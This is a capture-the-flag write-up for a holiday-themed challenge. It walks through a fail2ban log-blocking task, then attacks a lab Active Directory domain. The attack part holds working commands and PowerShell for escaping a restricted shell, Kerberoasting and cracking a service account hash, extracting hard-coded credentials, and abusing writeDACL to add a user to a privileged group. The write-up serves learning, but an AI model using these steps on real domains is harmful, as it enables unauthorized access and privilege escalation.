Kerberoasting on an Open Fire

Challenge : Obtain the secret sleigh research document from a host on the Elf University domain. What is the first secret ingredient Santa urges each elf and reindeer to consider for a wonderful holiday season? Start by registering as a student on the ElfU Portal. Find Eve Snowshoes in Santa's office for hints.
Difficulty Level :	Location : Santa’s Office	Elf/Troll : Eve Snowshoes

Please note this objective was not near Eve Snowshoes but since they provided such cool hints, I wanted to keep this elf here. Hints from Eve Snowshoes : (Because we solved their terminal challenge “HoHo…No”) There's a great talk by Chris Davis on this exact subject! There are also plenty of resources available to learn more about Kerberoasting specifically. If you have any trouble finding the domain controller on the 10.X.X.X network, remember that, when not running as root, nmap default probing relies on connecting to TCP 80 and 443. Got a hash that won't crack with your wordlist? OneRuleToRuleThemAll.rule is a great way to grow your keyspace. Where'd you get your wordlist? CeWL might generate a great wordlist from the ElfU website,but it will ignore digits in terms by default. Website: https://register.elfu.org/register

We first solve the HoHo..No terminal challenge from Eve Snowshoes.

HoHo..No Terminal Challenge

This terminal challenge needs us to identify the malicious IP addresses in the logs and add them to the naughty list so It could be blocked using fail2ban.

Thre is an excellent talk by Mr. Andy Smith on Fail2ban whicih immensely helped in solving this terminal challenge.

First find all the patterns of log entries in the/var/log/hohono.log
Exclude all the successful logins or valid heartbeats and put other in ashish.log.

cat /var/log/hohono.log | grep -v -e "success" -e "Valid heartbeat" > ashish.log

Replace all the IP addresses in ashish.log with naughty_ip

sed -i -e 's/[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}/naughty_ip/g' ashish.log

Get only the messages

cat ashish.log | cut -d ' ' -f3- | sort | uniq

Sample Unique log entries

Unique patterns of the log entries

Failed login from for user
Invalid heartbeat '' from
Login from rejected due to unknown user name
sent a malformed request

Now we can create the custom jail and then filter and actions for the custom jail.

Creating the custom jail

nano /etc/fail2ban/jail.d/my_jail.conf

Below would be the content of the my_jail.conf

[my_jail]
enabled = true
logpath = /var/log/hohono.log
findtime = 60m
maxretry = 10
bantime = 30m
filter = my_filter
action = my_action

Creating the custom filter

nano /etc/fail2ban/filter.d/my_filter.conf

Below would be the content of the my_filter.conf

[Definition]
failregex = <HOST> sent a malformed request$
Failed login from <HOST>
Login from <HOST> rejected due to unknown user name$
Invalid heartbeat \S+ from <HOST>$

Creating the custom action

nano /etc/fail2ban/filter.d/my_action.conf

Below would be the content of the my_action.conf
Please note this is where we add the IP addresses we have identified to get added to the naughtly list to ban using fail2ban.

[Definition]
actionban   = /root/naughtylist add <ip>
actionunban = /root/naughtylist add <ip>

Restart the fail2ban service

service fail2ban restart

Refresh the naughtylist

./naughtylist refresh

Achievement unlocked :

Now we go over to objective#8 Kerberoasting

Registration and SSH to elfu.local domain

We register on https://register.elfu.org/register using a custom domain.
We are provided a domain user named rflkkildwi and the password for it.

SSH to grades.elfu.local as rflkkildwi :

We see the below menu:

We escape the SSD using Ctrl+D.
Once in Python, use below to spawn an interactive bash shell.

import pty; pty.spawn("/bin/bash")  

Conduct reconnaissance :
Username and Hostname :

Local IP :

Get the neighbours. There are 4 of them.

Conduct nmap scan on top 10 ports on each of those hosts to know what services are running there.
Looks like 172.17.0.4 and 172.17.0.5 are running SMB and may have shared folders.

nmap -top-ports 10 172.17.0.4	nmap -top-ports 10 172.17.0.5

We look for shared folders on 172.17.0.4 and 172.17.0.5
Looks like 172.17.0.5 has two shared folders but the user rfkkildwi does not have access on these shares

1. \\172.17.0.5 \elfu_svc_shr
2. \\172.17.0.5 \research_dep

Request TGS ticket for the users in Hashcat format. The ticket is encrypted with account’s password so it can be brute forced offline.

Cracking the TGS hash for elfu.local\elfu_svc to get plaintext password

Downloading the OneRuleToRuleThemAll.rule

We have the TGS hash for elfu_svc form previous step.
We copy the has to local kali machine as hash.txt.
We will download OneRuleToRuleThemAll.rule from here.

wget https://raw.githubusercontent.com/NotSoSecure/password_cracking_rules/master/OneRuleToRuleThemAll.rule > OneRuleToRuleThemAll.rule

Generate the word list

Generate the word list using CeWL with –with-number option so it does not ignore digits.

cewl --with-numbers https://register.elfu.org/register  > wordlist.txt

Crack the TGS hash using Hashcat

Now we use the OneRuleToRuleThemAll.rule and wordlist.txt with Hashcat.

hashcat -m 13100 -a 0 hash.txt --potfile-disable -r OneRuleToRuleThemAll.rule --force -O -w 4 --opencl-device-types 1,2 wordlist.txt

We have the plaintext password for elfu_svc.
Snow2021!

Enumerate the file share "elfu_svc_shr" and get hard coded creds for remote_elf in the script

smbclient \\\\172.17.0.5\\elfu_svc_shr -U=elfu_svc

Enter the password “Snow2021!” (Without quotes).
And now we are able to enumerate all the files.

Check for any hard coded passwords.

#Set the prompt Off
prompt OFF
#Download all the files
mget *
#Exit out of the smbclient
exit
#Grep for ConvertTo-SecureString in all the files since you use that on plain text creds to convert to # secure strings
grep -C 2 ConvertTo-SecureString *

Looks like GetProcessInfo.ps1 has the hard coded credentials for another domain user named elfu.local\remote_elfu for a host 10.128.1.53.
The credentials look encrypted though. So, we may to convert that to plain text.

Get the password for the elfu.local\remote_elf

Run this in the terminal PowerShell 7

$key = (2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7)
$SecStringPassword = "76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
$aPass = $SecStringPassword | ConvertTo-SecureString -Key $key
ConvertFrom-SecureString -SecureString $aPass -AsPlainText 

We have the password for elfu.local\remote_elf:
A1d655f7f5d98b10!

Logon To Domain controller (DC01) using elfu.local\remote_elf

At this point we have the password for elfu.local\remote_elf which is A1d655f7f5d98b10!.
But this user also does not have access to \172.17.0.5\research_dep.
So, we may need to escalate privileges of our user (rflkkildwi) and let's see if we can leverage elfu.local\remote_elf for that.

Let’s login to the host 10.128.1.53 using elfu.local\remote_elf.
First enter into PowerShell

pwsh

Get the PSCredential object using the secure string.

# Setting up the creds
$SecStringPassword = "76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
$aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
$aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)

Using the creds above, create a new PowerShell session on 10.128.1.53

New-PSSession -Computer 10.128.1.53 -Credential $aCred

A new PowerShell session is created with id 1.

We enter the PowerShell session of 10.128.1.53 with name DC01 which looks like a domain controller when examining with Get-ADDomainController.

Enter-PSSession -Id 1
Get-ADDomainController -Discover -domain "elfu.local" -Service "PrimaryDC","TimeService"

Privilege Escalation

This involves escalating privileges of our user "rflkkildwi".
We do this by adding this user to "Research Department" AD group leveraging elfu.local\remote_elf.

Find which AD group the user elfu.local\remote_elf has writeDACL permission.
Tried with domain admins. This does not have writeDACL permission for remote_elf.

$ADSI = [ADSI]"LDAP://CN=Domain Admins,CN=Users,DC=elfu,DC=local"
$ADSI.psbase.ObjectSecurity.GetAccessRules($true,$true,[Security.Principal.NTAccount]) 

So, we numerate all the groups to see if something interesting come up.

Get-ADGroup to get all AD groups :

This “Research Department” group looks interesting :

We see all the Access rules for Research Department and we can see remote_elf has writeDACL permission on that group.

$ADSI = [ADSI]"LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local" 
$ADSI.psbase.ObjectSecurity.GetAccessRules($true,$true,[Security.Principal.NTAccount])

Using remote_elf, add "GenericAll" permission for the user "rflkkildwi" to the identified AD group.

Add-Type -AssemblyName System.DirectoryServices
$ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
$username = "rflkkildwi"
$nullGUID = [guid]'00000000-0000-0000-0000-000000000000'
$propGUID = [guid]'00000000-0000-0000-0000-000000000000'
$IdentityReference = (New-Object System.Security.Principal.NTAccount("elfu.local\$username")).Translate([System.Security.Principal.SecurityIdentifier])
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None
$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference, ([System.DirectoryServices.ActiveDirectoryRights] "GenericAll"), ([System.Security.AccessControl.AccessControlType] "Allow"), $propGUID, $inheritanceType, $nullGUID
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString
$secOptions = $domainDirEntry.get_Options()
$secOptions.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl
$domainDirEntry.RefreshCache()
$domainDirEntry.get_ObjectSecurity().AddAccessRule($ACE)
$domainDirEntry.CommitChanges()
$domainDirEntry.dispose()

We can verify if the GenericAll permission has been added for user "rflkkildwi" for AD group "Research Department"

$ADSI = [ADSI]"LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local" 
$ADSI.psbase.ObjectSecurity.GetAccessRules($true,$true,[Security.Principal.NTAccount])

Using remote_elf, add user "rflkkildwi" to the identified AD group.

Add-Type -AssemblyName System.DirectoryServices
$ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
$username = "rflkkildwi"
$password = "Pvwevsviq#"
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $password
$user = New-Object System.Security.Principal.NTAccount("elfu.local\$username")
$sid=$user.Translate([System.Security.Principal.SecurityIdentifier])
$b=New-Object byte[] $sid.BinaryLength
$sid.GetBinaryForm($b,0)
$hexSID=[BitConverter]::ToString($b).Replace('-','')
$domainDirEntry.Add("LDAP://<SID=$hexSID>")
$domainDirEntry.CommitChanges()
$domainDirEntry.dispose()

We can verify if the user "rflkkildwi" to the "Research Department" group.

Get-ADGroupMember -Identity 'ResearchDepartment' | Where-Object {$_.name -eq "rflkkildwi"}

Access the secret document

At this point rflkkildwi is added to the "Research Department" group.
So now we can access the document in the share '\172.17.0.5\research_dep' using "rflkkildwi" .

smbclient '\\172.17.0.5\research_dep'

Also can download the PDF from the share to the grade.elfu.local.

Change the shell to bin/bash on the grades.elfu.org session
Enter chsh to change your shell to /bin/bash.

chsh

From local kali box download the document from the grades.elfu.org.

Open the PDF locally to see the 1st secret ingredient – kindness
We use that as the answer for the objective and now the objective is completed.